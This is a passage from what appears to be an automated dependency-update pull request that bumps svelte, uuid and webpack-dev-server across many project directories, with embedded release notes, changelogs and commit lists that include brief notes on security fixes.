/plugins/questions-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/recruit-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/request-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/setting-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/support-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/survey-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/tags-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/task-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/telegram-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/templates-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/test-management-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/text-editor-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/time-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/tracker-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/training-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/uploader-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/view-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/workbench-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /pods/front directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /server/core directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /server/front directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /server/tool directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /services/ai-bot/pod-ai-bot directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /services/github/github-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /services/gmail/pod-gmail directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /services/love directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /services/telegram/pod-telegram directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 2 updates in the /templates/package directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte) and [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /templates/ui directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\n\nUpdates `svelte` from 4.2.20 to 5.55.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/releases\"\u003esvelte's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esvelte@5.55.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: unlink errored and otherwise finished batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18264\"\u003e#18264\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eperf: walk composedPath() directly in delegated event propagation (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18268\"\u003e#18268\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: transfer effects when merging batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18254\"\u003e#18254\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e$derived(await ...)\u003c/code\u003e in disconnected effect roots (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18273\"\u003e#18273\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: remove temporary raw-text hydration markers (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18269\"\u003e#18269\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: propagate async \u003ccode\u003e@const\u003c/code\u003e blockers through closure references so template expressions like \u003ccode\u003e{(() =\u0026gt; host)()}\u003c/code\u003e correctly wait for the awaited value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18309\"\u003e#18309\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: properly unlink batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18298\"\u003e#18298\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: settle discarded batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18290\"\u003e#18290\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: declare \u003ccode\u003elet:\u003c/code\u003e directives before \u003ccode\u003e{@const}\u003c/code\u003e declarations on slotted elements (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18271\"\u003e#18271\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resume outro-ed branches if they were kept around (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18291\"\u003e#18291\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18297\"\u003e#18297\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly coordinate component-level effects inside async blocks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18260\"\u003e#18260\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make unnecessary commit work less likely (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18263\"\u003e#18263\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: add tag name to \u003ccode\u003ea11y_click_events_have_key_events\u003c/code\u003e warning (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18272\"\u003e#18272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: catch rejected promises while merging/committing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18266\"\u003e#18266\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.55.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't unset batch when calling \u003ccode\u003e{#await ...}\u003c/code\u003e promise (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: promise-ify \u003ccode\u003e{#await await ...}\u003c/code\u003e expressions on the server and correctly hydrate them on the client (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: deduplicate dependencies that are added outside the init/update cycle (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid false-positive batch invariant error (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18246\"\u003e#18246\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: inline primitive constants in attribute values during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18232\"\u003e#18232\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.55.8\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix(print): handle \u003ccode\u003esvelte:body\u003c/code\u003e and fix keyframe percentage double-printing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18234\"\u003e#18234\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/blob/main/packages/svelte/CHANGELOG.md\"\u003esvelte's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.55.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: unlink errored and otherwise finished batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18264\"\u003e#18264\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eperf: walk composedPath() directly in delegated event propagation (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18268\"\u003e#18268\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: transfer effects when merging batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18254\"\u003e#18254\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e$derived(await ...)\u003c/code\u003e in disconnected effect roots (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18273\"\u003e#18273\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: remove temporary raw-text hydration markers (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18269\"\u003e#18269\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: propagate async \u003ccode\u003e@const\u003c/code\u003e blockers through closure references so template expressions like \u003ccode\u003e{(() =\u0026gt; host)()}\u003c/code\u003e correctly wait for the awaited value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18309\"\u003e#18309\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: properly unlink batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18298\"\u003e#18298\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: settle discarded batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18290\"\u003e#18290\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: declare \u003ccode\u003elet:\u003c/code\u003e directives before \u003ccode\u003e{@const}\u003c/code\u003e declarations on slotted elements (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18271\"\u003e#18271\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resume outro-ed branches if they were kept around (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18291\"\u003e#18291\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18297\"\u003e#18297\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly coordinate component-level effects inside async blocks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18260\"\u003e#18260\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make unnecessary commit work less likely (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18263\"\u003e#18263\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: add tag name to \u003ccode\u003ea11y_click_events_have_key_events\u003c/code\u003e warning (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18272\"\u003e#18272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: catch rejected promises while merging/committing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18266\"\u003e#18266\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.55.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't unset batch when calling \u003ccode\u003e{#await ...}\u003c/code\u003e promise (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: promise-ify \u003ccode\u003e{#await await ...}\u003c/code\u003e expressions on the server and correctly hydrate them on the client (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: deduplicate dependencies that are added outside the init/update cycle (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid false-positive batch invariant error (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18246\"\u003e#18246\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: inline primitive constants in attribute values during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18232\"\u003e#18232\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.55.8\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0bb715d3cfe51134756e79b6193dacccfa77361f\"\u003e\u003ccode\u003e0bb715d\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18255\"\u003e#18255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/49538608356eabc74fc182b03449112a4fa1f12d\"\u003e\u003ccode\u003e4953860\u003c/code\u003e\u003c/a\u003e chore: remove unused class property (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18307\"\u003e#18307\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/638ab370a561f97552229589f2f334655426fe5c\"\u003e\u003ccode\u003e638ab37\u003c/code\u003e\u003c/a\u003e fix: prevent batch unlinking twice (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18303\"\u003e#18303\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0da9f9e2ab515da16d624c5bc48b554beb179f92\"\u003e\u003ccode\u003e0da9f9e\u003c/code\u003e\u003c/a\u003e fix: disallow effect creation after \u003ccode\u003eawait\u003c/code\u003e (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18299\"\u003e#18299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/d4be4e297365030b5cbcb676bda133f2840816b2\"\u003e\u003ccode\u003ed4be4e2\u003c/code\u003e\u003c/a\u003e chore: ensure treeshaking test runs during CI (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18302\"\u003e#18302\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/e705369dee060e74ad9456e45824f36b1ee3c6cf\"\u003e\u003ccode\u003ee705369\u003c/code\u003e\u003c/a\u003e fix: propagate async \u003ca href=\"https://github.com/const\"\u003e\u003ccode\u003e@​const\u003c/code\u003e\u003c/a\u003e blockers through closure references (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18309\"\u003e#18309\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/ec08dbc7ee156d34816586feb49bb8650579e41f\"\u003e\u003ccode\u003eec08dbc\u003c/code\u003e\u003c/a\u003e fix: only unlink batch if we're done with it (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18298\"\u003e#18298\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/b40c359d44196b7b87745259243333763ed61ec5\"\u003e\u003ccode\u003eb40c359\u003c/code\u003e\u003c/a\u003e fix: don't assume boundary exists during increment/decrement (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18289\"\u003e#18289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/c01e598fff2a851323fb61c6325ef51b87f019fd\"\u003e\u003ccode\u003ec01e598\u003c/code\u003e\u003c/a\u003e fix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18297\"\u003e#18297\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/070a0c4f7708ae0caa209ff762d98c0f117e6adb\"\u003e\u003ccode\u003e070a0c4\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;perf: use Set instead of Array for constant lookups in utils.js\u0026quot; (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18\"\u003e#18\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/sveltejs/svelte/commits/svelte@5.55.10/packages/svelte\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for svelte since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 4.15.2 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca 